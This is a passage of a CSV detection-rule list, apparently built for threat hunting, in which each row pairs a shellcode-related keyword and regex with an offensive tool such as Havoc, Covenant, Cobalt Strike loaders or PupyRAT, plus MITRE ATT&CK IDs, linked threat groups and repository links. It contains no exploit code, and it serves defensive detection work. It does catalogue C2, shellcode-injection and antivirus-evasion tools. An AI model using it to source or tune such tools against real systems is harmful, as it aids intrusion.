*",".{0,1000}shellc\s.{0,1000}\.bin\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","59296" "*shellc *.shellc *",".{0,1000}shellc\s.{0,1000}\.shellc\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","59297" "*ShellCmd cmd.exe *",".{0,1000}ShellCmd\scmd\.exe\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","59298" "*ShellCmd copy *",".{0,1000}ShellCmd\scopy\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","59299" "*ShellCmd net *",".{0,1000}ShellCmd\snet\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","59300" "*ShellCmd sc qc *",".{0,1000}ShellCmd\ssc\sqc\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - 
T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","59301" "*Shellcode & key Decrypted after stomping*",".{0,1000}Shellcode\s\&\skey\sDecrypted\safter\sstomping.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","59302" "*SHELLCODE GENERATOR*",".{0,1000}SHELLCODE\sGENERATOR.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","59303" "*shellcode inject *",".{0,1000}shellcode\sinject\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","59304" "*Shellcode Injected Successfully*",".{0,1000}Shellcode\sInjected\sSuccessfully.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","59305" 
"*Shellcode injection complete!*",".{0,1000}Shellcode\sinjection\scomplete!.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","59306" "*Shellcode path changed:*shellcode_path*",".{0,1000}Shellcode\spath\schanged\:.{0,1000}shellcode_path.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","59307" "*Shellcode Process Hollowing.csproj*",".{0,1000}Shellcode\sProcess\sHollowing\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59308" "*Shellcode Process Hollowing.csproj*",".{0,1000}Shellcode\sProcess\sHollowing\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 
- T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59309" "*Shellcode Process Injector.ps1*",".{0,1000}Shellcode\sProcess\sInjector\.ps1.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59310" "*shellcode spawn *",".{0,1000}shellcode\sspawn\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","59311" "*shellcode*shellcode.bin*",".{0,1000}shellcode.{0,1000}shellcode\.bin.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","59312" "*shellcode.asm*",".{0,1000}shellcode\.asm.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","N/A","5","460","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z","59313" "*shellcode.bin.donut*",".{0,1000}shellcode\.bin\.donut.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","59314" "*Shellcode.x64.bin*",".{0,1000}Shellcode\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","59315" "*shellcode_dll.dll*",".{0,1000}shellcode_dll\.dll.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation 
tool","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","","N/A","","","","59316" "*shellcode_dll\*",".{0,1000}shellcode_dll\\.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A","N/A","","N/A","","","","59317" "*shellcode_dotnet2js*",".{0,1000}shellcode_dotnet2js.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","59318" "*shellcode_dropper.c*",".{0,1000}shellcode_dropper\.c.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","59319" "*shellcode_dynwrapx*",".{0,1000}shellcode_dynwrapx.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","59320" "*Shellcode_encryption.exe*",".{0,1000}Shellcode_encryption\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","N/A","10","10","412","47","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z","59321" "*shellcode_exec.py*",".{0,1000}shellcode_exec\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - 
T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","59322" "*shellcode_generator.*",".{0,1000}shellcode_generator\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 
29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","59323" "*shellcode_generator_help.html*",".{0,1000}shellcode_generator_help\.html.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","59324" 
"*shellcode_inject.csproj*",".{0,1000}shellcode_inject\.csproj.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","N/A","10","1498","256","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z","59325" "*shellcode_inject.rb*",".{0,1000}shellcode_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59326" "*shellcode_injectproc.xml*",".{0,1000}shellcode_injectproc\.xml.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","59327" "*ShellCode_Loader.py*",".{0,1000}ShellCode_Loader\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","N/A","10","10","412","47","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z","59328" "*shellcode1 += b*",".{0,1000}shellcode1\s\+\=\sb.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","59329" "*shellcode20.exe*",".{0,1000}shellcode20\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","N/A","10","10","20","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z","59330" 
"*Shellcode2VBA(*",".{0,1000}Shellcode2VBA\(.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#content","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","59331" "*Shellcode2VBAFunc(*",".{0,1000}Shellcode2VBAFunc\(.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#content","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","59332" "*Shellcode2VBAFunc*",".{0,1000}Shellcode2VBAFunc.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","59333" "*shellcode30.exe*",".{0,1000}shellcode30\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - 
